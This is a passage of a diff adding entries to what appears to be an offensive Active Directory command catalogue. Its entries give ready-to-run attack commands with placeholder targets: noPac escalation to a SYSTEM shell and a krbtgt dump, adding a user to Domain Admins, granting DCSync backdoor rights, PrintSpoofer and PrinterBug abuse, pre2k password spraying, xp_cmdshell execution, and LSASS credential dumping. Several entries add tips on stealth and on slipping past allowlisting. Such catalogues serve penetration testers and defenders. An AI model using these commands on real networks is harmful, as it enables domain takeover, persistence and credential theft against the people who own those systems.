"services": [ + "SMB" + ], + "references": [ + "https://github.com/Pennyw0rth/NetExec", + "https://www.netexec.wiki/smb-protocol/obtaining-credentials/veeam" + ], + "added": true + }, + { + "id": "wadcoms:Nltest-DomainTrusts-Discovery", + "toolId": "wadcoms:Nltest", + "toolName": "Nltest", + "name": "Nltest-DomainTrusts-Discovery", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Discovery", + "Enumeration" + ], + "nativeCategory": [ + "Discovery", + "Enumeration" + ], + "command": "# List all trust relationships in the forest\nnltest /domain_trusts /all_trusts\n# Enumerate domain controllers for the domain\nnltest /dclist:test.local", + "description": "nltest.exe is a signed Windows built-in (living-off-the-land) used to map trust relationships and locate domain controllers from an existing foothold, with no third-party tooling dropped to disk. /domain_trusts /all_trusts lists every trust relationship in the forest, and /dclist:<domain> enumerates the DCs for a domain - both useful for planning cross-domain and cross-forest movement. It runs in the current user's context on any domain-joined host.\n\nCommand Reference:\n\n\tDomain: test.local", + "mitre": [ + "T1482" + ], + "requires": [ + "Shell" + ], + "services": [ + "LDAP", + "Kerberos" + ], + "references": [ + "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", + "https://attack.mitre.org/techniques/T1482/", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology" + ], + "added": true + }, + { + "id": "wadcoms:noPac-SAMSpoof", + "toolId": "wadcoms:noPac", + "toolName": "noPac", + "name": "noPac (CVE-2021-42278 + CVE-2021-42287)", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Execution", + "Credential Access" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation", + "Credential Access" + ], + "command": "# Interactive SYSTEM shell on the DC\npython3 noPac.py test.local/john:password123 -dc-ip 10.10.10.1 -dc-host DC01 --impersonate administrator -use-ldap -shell\n\n# Dump the krbtgt hash via secretsdump\npython3 noPac.py test.local/john:password123 -dc-ip 10.10.10.1 -dc-host DC01 --impersonate administrator -use-ldap -dump -just-dc-user krbtgt", + "description": "noPac.py (Ridter) chains CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion) to escalate from a low-privileged domain user to SYSTEM on the Domain Controller. It adds a new machine account, renames its sAMAccountName to match the DC (dropping the trailing $), requests a TGT, restores the name, then performs S4U2self to obtain a service ticket impersonating a Domain Admin. Requires MachineAccountQuota > 0 (default 10) and a DC unpatched against the November 2021 fixes. Use -shell for an interactive SYSTEM shell via smbexec or -dump to run secretsdump against the DC.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1\n\n\tDC host: DC01\n\n\tImpersonate: administrator", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "Kerberos", + "SMB", + "LDAP" + ], + "references": [ + "https://github.com/Ridter/noPac", + "https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology" + ], + "added": true + }, + { + "id": "wadcoms:noPac-Scanner", + "toolId": "wadcoms:noPac", + "toolName": "noPac", + "name": "noPac Vulnerability Scanner", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Enumeration", + "Discovery" + ], + "nativeCategory": [ + "Enumeration", + "Discovery" + ], + "command": "python3 scanner.py test.local/john:password123 -dc-ip 10.10.10.1 -use-ldap", + "description": "scanner.py ships with Ridter's noPac and safely checks whether a Domain Controller is exploitable via the sAMAccountName spoofing chain without adding or renaming any accounts. It authenticates as a normal domain user and reports the current MachineAccountQuota and whether the DC is patched against CVE-2021-42278 / CVE-2021-42287. Run it first as a low-noise reconnaissance step before launching the full noPac.py exploit.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "Kerberos", + "LDAP", + "SMB" + ], + "references": [ + "https://github.com/Ridter/noPac", + "https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing" + ], + "added": true + }, + { + "id": "wadcoms:PowerMad-NewMachineAccount", + "toolId": "wadcoms:PowerMad", + "toolName": "PowerMad", + "name": "PowerMad-NewMachineAccount", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Execution", + "Privilege Escalation" + ], + "nativeCategory": [ + "Exploitation", + "PrivEsc" + ], + "command": "# Import Powermad and create a new machine account\nImport-Module .\\Powermad.ps1\nNew-MachineAccount -MachineAccount EVILPC -Password $(ConvertTo-SecureString 'password123' -AsPlainText -Force)", + "description": "Powermad's New-MachineAccount cmdlet creates a new computer account in the domain over LDAP/SAMR from a Windows foothold, abusing the default ms-DS-MachineAccountQuota (10) that lets any authenticated user add machine accounts. The resulting account, with a password you supply, is the controlled principal for RBCD and shadow-credential chains carried out with SharpAllowedToAct or Rubeus. Run it in-session as any domain user; verify the quota is non-zero first.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tNew machine account: EVILPC\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "PowerShell", + "Shell" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/Kevin-Robertson/Powermad", + "https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation" + ], + "added": true + }, + { + "id": "wadcoms:PowerUpSQL-Get-SQLServerLinkCrawl", + "toolId": "wadcoms:PowerUpSQL", + "toolName": "PowerUpSQL", + "name": "PowerUpSQL-Get-SQLServerLinkCrawl", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Privilege Escalation", + "Lateral Movement" + ], + "nativeCategory": [ + "PrivEsc", + "Lateral Movement" + ], + "command": "Import-Module .\\PowerUpSQL.ps1\n\n# Crawl all linked servers from the starting instance\nGet-SQLServerLinkCrawl -Verbose -Instance 10.10.10.1 -Query \"SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin')\"\n\n# Run an OS command on any node that allows it\nGet-SQLServerLinkCrawl -Verbose -Instance 10.10.10.1 -Query \"exec master..xp_cmdshell 'whoami'\"", + "description": "Get-SQLServerLinkCrawl recursively follows linked-server definitions from a starting instance, executing a query at every hop via OPENQUERY chains. Because linked servers frequently run under a higher-privileged (often sysadmin) mapped login on the remote side, crawling the graph commonly yields privilege escalation or lateral movement to instances the operator could not reach directly. Supply -Query to fingerprint each node, or drive command execution through xp_cmdshell across the chain.\n\nCommand Reference:\n\n\tTarget instance: 10.10.10.1", + "mitre": [], + "requires": [ + "PowerShell" + ], + "services": [ + "MSSQL" + ], + "references": [ + "https://github.com/NetSPI/PowerUpSQL", + "https://www.netspi.com/blog/technical-blog/network-penetration-testing/how-to-hack-database-links-in-sql-server/", + "https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server" + ], + "added": true + }, + { + "id": "wadcoms:PowerUpSQL-GetSQLInstanceDomain", + "toolId": "wadcoms:PowerUpSQL", + "toolName": "PowerUpSQL", + "name": "PowerUpSQL-GetSQLInstanceDomain", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Discovery", + "Enumeration" + ], + "nativeCategory": [ + "Discovery", + "Enumeration" + ], + "command": "Import-Module .\\PowerUpSQL.ps1\n\n# Discover SQL Server instances from SPNs in the domain\nGet-SQLInstanceDomain\n\n# Then test which ones accept the current user\nGet-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose", + "description": "Get-SQLInstanceDomain queries the domain via LDAP for Service Principal Names beginning with MSSQL*, revealing every registered SQL Server instance and the account it runs as without touching a single database. It is the standard domain-wide MSSQL discovery step and runs under the current user's context from a domain-joined foothold. Pipe the results into Get-SQLConnectionTestThreaded to find which instances your account can actually log into.\n\nCommand Reference:\n\n\tDomain: test.local", + "mitre": [], + "requires": [ + "PowerShell" + ], + "services": [ + "MSSQL", + "LDAP" + ], + "references": [ + "https://github.com/NetSPI/PowerUpSQL", + "https://www.netspi.com/blog/technical-blog/network-penetration-testing/finding-sensitive-data-domain-sql-servers-powerupsql/", + "https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server" + ], + "added": true + }, + { + "id": "wadcoms:PowerUpSQL-Invoke-SQLAudit", + "toolId": "wadcoms:PowerUpSQL", + "toolName": "PowerUpSQL", + "name": "PowerUpSQL-Invoke-SQLAudit", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation" + ], + "command": "Import-Module .\\PowerUpSQL.ps1\n\n# Audit an instance for privesc issues\nInvoke-SQLAudit -Verbose -Instance 10.10.10.1\n\n# Execute an OS command through the instance\nInvoke-SQLOSCmd -Verbose -Instance 10.10.10.1 -Command \"whoami\"", + "description": "Invoke-SQLAudit runs PowerUpSQL's battery of privilege-escalation checks against an instance and reports exploitable misconfigurations (impersonation, trustworthy databases, agent jobs, etc.). Where the login already has the rights, Invoke-SQLOSCmd executes an operating-system command through the instance (using xp_cmdshell), returning output. Both take -Instance in HOST\\INSTANCE or HOST,PORT form and use integrated auth by default.\n\nCommand Reference:\n\n\tTarget instance: 10.10.10.1", + "mitre": [], + "requires": [ + "PowerShell" + ], + "services": [ + "MSSQL" + ], + "references": [ + "https://github.com/NetSPI/PowerUpSQL", + "https://www.netspi.com/blog/technical-blog/network-penetration-testing/establishing-registry-persistence-via-sql-server-powerupsql/", + "https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server" + ], + "added": true + }, + { + "id": "wadcoms:PowerView-AddDomainGroupMember-DA", + "toolId": "wadcoms:PowerView", + "toolName": "PowerView", + "name": "PowerView-AddDomainGroupMember-DA", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Privilege Escalation", + "Persistence" + ], + "nativeCategory": [ + "PrivEsc", + "Persistence" + ], + "command": "Import-Module .\\PowerView.ps1\nAdd-DomainGroupMember -Identity 'Domain Admins' -Members john -Verbose\n# Verify\nGet-DomainGroupMember -Identity 'Domain Admins' | select MemberName", + "description": "Add-DomainGroupMember adds a principal to a group over LDAP, and when you hold write access to the membership of a privileged group (for example via an abusable GenericAll/WriteMembers ACE) this promotes a controlled account straight into Domain Admins. This is a loud, high-impact change that should be reverted with Remove-DomainGroupMember after the objective; it is often paired with -Credential to act as the principal that actually holds the right.\n\nCommand Reference:\n\n\tUsername: john\n\n\tTarget group: Domain Admins", + "mitre": [], + "requires": [ + "PowerShell" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/PowerShellMafia/PowerSploit", + "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993", + "https://www.thehacker.recipes/ad/movement/dacl/" + ], + "added": true + }, + { + "id": "wadcoms:PowerView-AddDomainObjectAcl-DCSync", + "toolId": "wadcoms:PowerView", + "toolName": "PowerView", + "name": "PowerView-AddDomainObjectAcl-DCSync", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Persistence", + "Credential Access", + "Privilege Escalation" + ], + "nativeCategory": [ + "Persistence", + "Credential Access", + "PrivEsc" + ], + "command": "Import-Module .\\PowerView.ps1\n# Grant john DCSync replication rights on the domain object\nAdd-DomainObjectAcl -TargetIdentity 'DC=test,DC=local' -PrincipalIdentity john -Rights DCSync -Verbose", + "description": "Add-DomainObjectAcl grants an ACE on a target object to a principal you control. Targeting the domain head with -Rights DCSync adds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, letting your account replicate secrets (a DCSync attack) without being a Domain Admin. This requires that your current context can already write the domain object's DACL (e.g. WriteDacl on the domain), and it is a durable backdoor that should be cleaned up with Remove-DomainObjectAcl.\n\nCommand Reference:\n\n\tPrincipal granted rights: john\n\n\tDomain: test.local", + "mitre": [], + "requires": [ + "PowerShell" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/PowerShellMafia/PowerSploit", + "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993", + "https://www.thehacker.recipes/ad/movement/dacl/grant-rights.html" + ], + "added": true + }, + { + "id": "wadcoms:PowerView-ASREPRoastable", + "toolId": "wadcoms:PowerView", + "toolName": "PowerView", + "name": "PowerView-ASREPRoastable", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Enumeration", + "Discovery" + ], + "nativeCategory": [ + "Enumeration", + "Discovery" + ], + "command": "Import-Module .\\PowerView.ps1\nGet-DomainUser -PreauthNotRequired -Properties samaccountname,useraccountcontrol -Verbose", + "description": "Get-DomainUser -PreauthNotRequired finds accounts with the DONT_REQ_PREAUTH flag (userAccountControl bit 0x400000), which are AS-REP roastable because a DC will return an encrypted AS-REP without prior authentication. Use it to identify targets whose AS-REP hash you can then crack offline. This is an LDAP read only; the actual roast is performed with a separate tool such as Rubeus or GetNPUsers.\n\nCommand Reference:\n\n\tDomain: test.local", + "mitre": [], + "requires": [ + "PowerShell" + ], + "services": [ + "LDAP", + "Kerberos" + ], + "references": [ + "https://github.com/PowerShellMafia/PowerSploit", + "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast" + ], + "added": true + }, + { + "id": "wadcoms:PowerView-DomainTrust", + "toolId": "wadcoms:PowerView", + "toolName": "PowerView", + "name": "PowerView-DomainTrust", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Enumeration", + "Discovery" + ], + "nativeCategory": [ + "Enumeration", + "Discovery" + ], + "command": "Import-Module .\\PowerView.ps1\n# Trusts of the current domain\nGet-DomainTrust\n# Forest / inter-forest trusts\nGet-ForestTrust\n# Recursively map every reachable trust\nGet-DomainTrustMapping", + "description": "Get-DomainTrust enumerates the trust relationships of the current (or a specified) domain, while Get-ForestTrust returns forest-level (inter-forest) trusts. Reading trust direction, transitivity, and SID-filtering state is the first step in planning cross-domain and cross-forest attacks such as foreign group membership abuse or trust-key based ticket forging. Get-DomainTrustMapping walks reachable domains recursively to build the full trust graph.\n\nCommand Reference:\n\n\tDomain: test.local", + "mitre": [], + "requires": [ + "PowerShell" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/PowerShellMafia/PowerSploit", + "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology" + ], + "added": true + }, + { + "id": "wadcoms:PowerView-FindLocalAdminAccess", + "toolId": "wadcoms:PowerView", + "toolName": "PowerView", + "name": "PowerView-FindLocalAdminAccess", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Discovery", + "Lateral Movement" + ], + "nativeCategory": [ + "Discovery", + "Lateral Movement" + ], + "command": "Import-Module .\\PowerView.ps1\nFind-LocalAdminAccess -Verbose | Out-File output.txt", + "description": "Find-LocalAdminAccess queries the domain for all computers and then, using the OpenServiceControlManager check, tests each one to see whether the current user context has local administrator access. It is the fastest way to discover where your foothold account can already move laterally without cracking anything. The SCM probes generate authentication traffic to many hosts, so it is not stealthy on a monitored network.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tOutput file: output.txt", + "mitre": [], + "requires": [ + "PowerShell" + ], + "services": [ + "SMB" + ], + "references": [ + "https://github.com/PowerShellMafia/PowerSploit", + "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology" + ], + "added": true + }, + { + "id": "wadcoms:PowerView-GetDomainObjectAcl", + "toolId": "wadcoms:PowerView", + "toolName": "PowerView", + "name": "PowerView-GetDomainObjectAcl", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Discovery", + "Privilege Escalation" + ], + "nativeCategory": [ + "Discovery", + "PrivEsc" + ], + "command": "Import-Module .\\PowerView.ps1\nGet-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs |\n ? { $_.ActiveDirectoryRights -match 'WriteDacl|WriteOwner|GenericAll|GenericWrite' }", + "description": "Get-DomainObjectAcl returns the raw DACL for a single object so you can confirm exactly which principals hold which rights over a specific user, group, computer, or the domain head. Pair -Identity with -ResolveGUIDs to expand extended rights such as DS-Replication-Get-Changes (DCSync) or User-Force-Change-Password. This is the targeted follow-up to Find-InterestingDomainAcl when you already know the object you want to attack.\n\nCommand Reference:\n\n\tTarget object: Domain Admins\n\n\tDomain: test.local", + "mitre": [], + "requires": [ + "PowerShell" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/PowerShellMafia/PowerSploit", + "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993", + "https://www.thehacker.recipes/ad/movement/dacl/" + ], + "added": true + }, + { + "id": "wadcoms:PowerView-GPOLocalGroup", + "toolId": "wadcoms:PowerView", + "toolName": "PowerView", + "name": "PowerView-GPOLocalGroup", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Enumeration", + "Discovery" + ], + "nativeCategory": [ + "Enumeration", + "Discovery" + ], + "command": "Import-Module .\\PowerView.ps1\n# All GPOs in the domain\nGet-DomainGPO -Properties displayname,name\n# GPOs that modify local group membership\nGet-DomainGPOLocalGroup\n# Where does 'john' become a local Administrator via GPO?\nGet-DomainGPOUserLocalGroupMapping -Identity john -LocalGroup Administrators", + "description": "Get-DomainGPO enumerates every Group Policy Object in the domain, and Get-DomainGPOLocalGroup parses GPOs that use Restricted Groups or Group Policy Preferences to set local group membership (for example local Administrators). Get-DomainGPOUserLocalGroupMapping then resolves which machines a given user or group ends up as local admin on through those GPOs. Together they map the GPO-to-local-admin relationships needed for lateral movement and for finding GPOs worth abusing.\n\nCommand Reference:\n\n\tUsername: john\n\n\tDomain: test.local", + "mitre": [], + "requires": [ + "PowerShell" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/PowerShellMafia/PowerSploit", + "https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e", + "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993" + ], + "added": true + }, + { + "id": "wadcoms:PowerView-InterestingDomainAcl", + "toolId": "wadcoms:PowerView", + "toolName": "PowerView", + "name": "PowerView-InterestingDomainAcl", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Discovery", + "Privilege Escalation" + ], + "nativeCategory": [ + "Discovery", + "PrivEsc" + ], + "command": "Import-Module .\\PowerView.ps1\nFind-InterestingDomainAcl -ResolveGUIDs |\n ? { $_.IdentityReferenceName -eq 'john' } |\n select ObjectDN, ActiveDirectoryRights, IdentityReferenceName", + "description": "Find-InterestingDomainAcl surfaces ACEs across the domain that grant modification rights (GenericAll, GenericWrite, WriteDacl, WriteOwner, ResetPassword, etc.) to non-built-in principals, which are the ACL-based privilege escalation paths. The -ResolveGUIDs switch translates extended-right and property-set object GUIDs into human-readable names so DCSync and ForceChangePassword rights are legible. Filtering the output to your controlled principals quickly reveals abusable edges.\n\nCommand Reference:\n\n\tUsername: john", + "mitre": [], + "requires": [ + "PowerShell" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/PowerShellMafia/PowerSploit", + "https://www.thehacker.recipes/ad/movement/dacl/", + "https://wald0.com/?p=112" + ], + "added": true + }, + { + "id": "wadcoms:PowerView-InvokeUserHunter", + "toolId": "wadcoms:PowerView", + "toolName": "PowerView", + "name": "PowerView-InvokeUserHunter", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Discovery", + "Lateral Movement" + ], + "nativeCategory": [ + "Discovery", + "Lateral Movement" + ], + "command": "Import-Module .\\PowerView.ps1\n# Hunt for any Domain Admin session, flag where we already have admin\nInvoke-UserHunter -GroupName 'Domain Admins' -CheckAccess\n# Quieter variant: only query likely session hosts\nInvoke-UserHunter -GroupName 'Domain Admins' -Stealth", + "description": "Invoke-UserHunter finds machines where a target user (or members of a target group such as Domain Admins) is logged in or has an active session, by combining Get-NetSession, Get-NetLoggedon, and Get-NetComputer across the domain. Adding -CheckAccess also reports whether you already have local admin on the hosts where the target is present, marking immediate credential-theft opportunities. Use -Stealth to only query high-value session hosts (DCs, file servers) and reduce noise.\n\nCommand Reference:\n\n\tTarget group: Domain Admins", + "mitre": [], + "requires": [ + "PowerShell" + ], + "services": [ + "SMB" + ], + "references": [ + "https://github.com/PowerShellMafia/PowerSploit", + "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology" + ], + "added": true + }, + { + "id": "wadcoms:PowerView-Kerberoastable-SPN", + "toolId": "wadcoms:PowerView", + "toolName": "PowerView", + "name": "PowerView-Kerberoastable-SPN", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Enumeration", + "Discovery" + ], + "nativeCategory": [ + "Enumeration", + "Discovery" + ], + "command": "# Import PowerView into the current session first\nImport-Module .\\PowerView.ps1\n# List every account with an SPN (kerberoastable)\nGet-DomainUser -SPN -Properties samaccountname,serviceprincipalname | Out-File output.txt", + "description": "PowerView's Get-DomainUser -SPN enumerates domain user accounts that have a servicePrincipalName set, which are the candidates for Kerberoasting. Run it from an existing domain-joined foothold shell to build a target list before requesting service tickets. It only queries LDAP and does not request any TGS, so it is quiet on its own; the noisy step is the later roast.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tOutput file: output.txt", + "mitre": [], + "requires": [ + "PowerShell" + ], + "services": [ + "LDAP", + "Kerberos" + ], + "references": [ + "https://github.com/PowerShellMafia/PowerSploit", + "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast" + ], + "added": true + }, + { + "id": "wadcoms:PowerView-SetDomainObjectOwner", + "toolId": "wadcoms:PowerView", + "toolName": "PowerView", + "name": "PowerView-SetDomainObjectOwner", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Privilege Escalation", + "Persistence" + ], + "nativeCategory": [ + "PrivEsc", + "Persistence" + ], + "command": "Import-Module .\\PowerView.ps1\n# Take ownership of the target, then we can rewrite its DACL\nSet-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity john -Verbose\nAdd-DomainObjectAcl -TargetIdentity 'Domain Admins' -PrincipalIdentity john -Rights All", + "description": "Set-DomainObjectOwner changes the owner of an AD object to a principal you control. When you hold WriteOwner over a target, taking ownership lets you then write its DACL (via Add-DomainObjectAcl) and grant yourself full control, chaining a limited ACE into complete object takeover. This is the classic first step of a WriteOwner-to-GenericAll escalation against a privileged group or user.\n\nCommand Reference:\n\n\tNew owner: john\n\n\tTarget object: Domain Admins", + "mitre": [], + "requires": [ + "PowerShell" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/PowerShellMafia/PowerSploit", + "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993", + "https://www.thehacker.recipes/ad/movement/dacl/" + ], + "added": true + }, + { + "id": "wadcoms:pre2k-Auth", + "toolId": "wadcoms:pre2k", + "toolName": "pre2k", + "name": "pre2k Authenticated Enumeration", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Discovery", + "Credential Access" + ], + "nativeCategory": [ + "Discovery", + "Credential Access" + ], + "command": "pre2k auth -d test.local -u john -p password123 -dc-ip 10.10.10.1 -save", + "description": "In auth mode pre2k uses valid domain credentials to query LDAP for computer objects whose userAccountControl still flags them as pre-created (pwdLastSet == 0 / never logged on) and sprays the lowercase-name password against each. This finds pre-Windows 2000 accounts that are still active and abusable directly from an existing foothold, avoiding blind guessing. Add -targeted to focus on accounts with no lastlogontimestamp and -save to grab a TGT for each hit.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "LDAP", + "Kerberos" + ], + "references": [ + "https://github.com/garrettfoster13/pre2k", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology" + ], + "added": true + }, + { + "id": "wadcoms:pre2k-Unauth", + "toolId": "wadcoms:pre2k", + "toolName": "pre2k", + "name": "pre2k Unauthenticated Spray", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access", + "Discovery" + ], + "nativeCategory": [ + "Credential Access", + "Discovery" + ], + "command": "pre2k unauth -d test.local -dc-ip 10.10.10.1 -inputfile output.txt -save", + "description": "pre2k (Garrett Foster) abuses pre-Windows 2000 pre-created computer accounts, whose password is the lowercase of the sAMAccountName without the trailing dollar sign (e.g. account WORKSTATION01$ has password 'workstation01'). In unauth mode it takes a list of candidate machine names (recovered from a null LDAP/RPC bind or enumeration) and Kerberos pre-auth sprays them, requiring no domain credentials. Use -save to request and store a TGT (.ccache) for any account that authenticates, giving an initial foothold.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tDC IP: 10.10.10.1\n\n\tInput file: output.txt", + "mitre": [], + "requires": [ + "No_Creds" + ], + "services": [ + "Kerberos", + "LDAP" + ], + "references": [ + "https://github.com/garrettfoster13/pre2k", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology" + ], + "added": true + }, + { + "id": "wadcoms:PrinterBug-printerbug", + "toolId": "wadcoms:PrinterBug", + "toolName": "PrinterBug", + "name": "PrinterBug-printerbug", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Execution" + ], + "nativeCategory": [ + "Exploitation" + ], + "command": "python3 printerbug.py test.local/john:password123@10.10.10.1 10.10.10.2", + "description": "printerbug.py (shipped with dirkjanm's krbrelayx toolkit) abuses the MS-RPRN Print System Remote Protocol (the SpoolSample / PrinterBug technique) by calling RpcRemoteFindFirstPrinterChangeNotificationEx on the target's spooler service, forcing the target machine account to authenticate back to an attacker-controlled host over SMB or HTTP. The captured machine-account authentication is then relayed with ntlmrelayx or krbrelayx (e.g. for RBCD or ADCS abuse). The target is given as a domain/user:password@target connection string followed by the attacker host. Requires a valid domain account and a running Print Spooler on the target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "RPC", + "NTLM" + ], + "references": [ + "https://github.com/dirkjanm/krbrelayx", + "https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn" + ], + "added": true + }, + { + "id": "wadcoms:PrintSpoofer-SeImpersonate", + "toolId": "wadcoms:PrintSpoofer", + "toolName": "PrintSpoofer", + "name": "PrintSpoofer-SeImpersonate", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation" + ], + "command": "# Spawn an interactive SYSTEM shell in the current console\nPrintSpoofer64.exe -i -c cmd\n\n# Or run a single payload as SYSTEM (non-interactive)\nPrintSpoofer64.exe -c \"C:\\Windows\\System32\\cmd.exe /c whoami > C:\\output.txt\"", + "description": "PrintSpoofer abuses SeImpersonatePrivilege held by service accounts (IIS AppPool, MSSQL, etc.) to escalate to SYSTEM. It coerces the local Print Spooler service to authenticate to an attacker-controlled named pipe (\\\\pipe\\\\spoolss) via MS-RPRN, captures the SYSTEM token with ImpersonateNamedPipeClient, and uses CreateProcessAsUser/WithTokenW to spawn a process. Use it when you land as a low-privileged service account whose token shows SeImpersonatePrivilege enabled; it works on Windows 10 / Server 2016-2019 where JuicyPotato's DCOM path was patched. Requires the Print Spooler service running and the SeImpersonate (or SeAssignPrimaryToken) privilege.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege", + "mitre": [], + "requires": [ + "Shell" + ], + "services": [ + "RPC" + ], + "references": [ + "https://github.com/itm4n/PrintSpoofer", + "https://itm4n.github.io/printspoofer-abusing-impersonation-privileges/", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer" + ], + "added": true + }, + { + "id": "wadcoms:Procdump-LSASS", + "toolId": "wadcoms:Procdump", + "toolName": "Procdump", + "name": "Procdump-LSASS", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "procdump.exe -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass.dmp", + "description": "Procdump is a signed Microsoft Sysinternals utility, so it often survives application allowlisting and looks benign on disk while still producing a full LSASS memory dump. The -ma flag writes a complete dump (all memory) of lsass.exe and -accepteula suppresses the license prompt for non-interactive use. It needs administrator rights with SeDebugPrivilege; copy the .dmp off-host and extract credentials with pypykatz or Mimikatz sekurlsa::minidump.\n\nCommand Reference:\n\n\tOutput dump: C:\\Windows\\Temp\\lsass.dmp", + "mitre": [ + "T1003.001" + ], + "requires": [ + "Shell" + ], + "services": [ + "NTLM", + "Kerberos" + ], + "references": [ + "https://learn.microsoft.com/en-us/sysinternals/downloads/procdump", + "https://book.hacktricks.xyz/windows-hardening/stealing-credentials", + 